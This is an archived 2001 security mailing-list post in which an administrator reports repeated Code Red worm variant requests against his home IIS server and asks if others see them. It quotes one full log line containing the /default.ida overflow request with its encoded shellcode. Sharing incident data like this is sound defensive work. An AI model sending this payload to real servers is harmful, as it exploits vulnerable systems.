|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: Michael Katz (mike
responsible.com)Date: Sat Aug 04 2001 - 14:44:14 CDT
Hi all,
Beginning at 14:03 GMT and 18:57 continuing until Aug. 4, 2001, I have seen the following entry 65 times against my home server:
2001-08-04 18:47:11 24.147.178.221 GET /default.ida XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 404 604 3818 HTTP/1.0 - -
Note that the character used is X instead of N as is typically seen in the Code Red worm. The code inserted, however, appears to be the same.
All of the attacks have come from 24.x.x.x IP addresses, which usually indicate home cable modem users. Most of these appear be from Windows machines. Has anyone else seen this traffic?
Michael Katz
mikeresponsible.com
Responsible Solutions, Ltd.
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]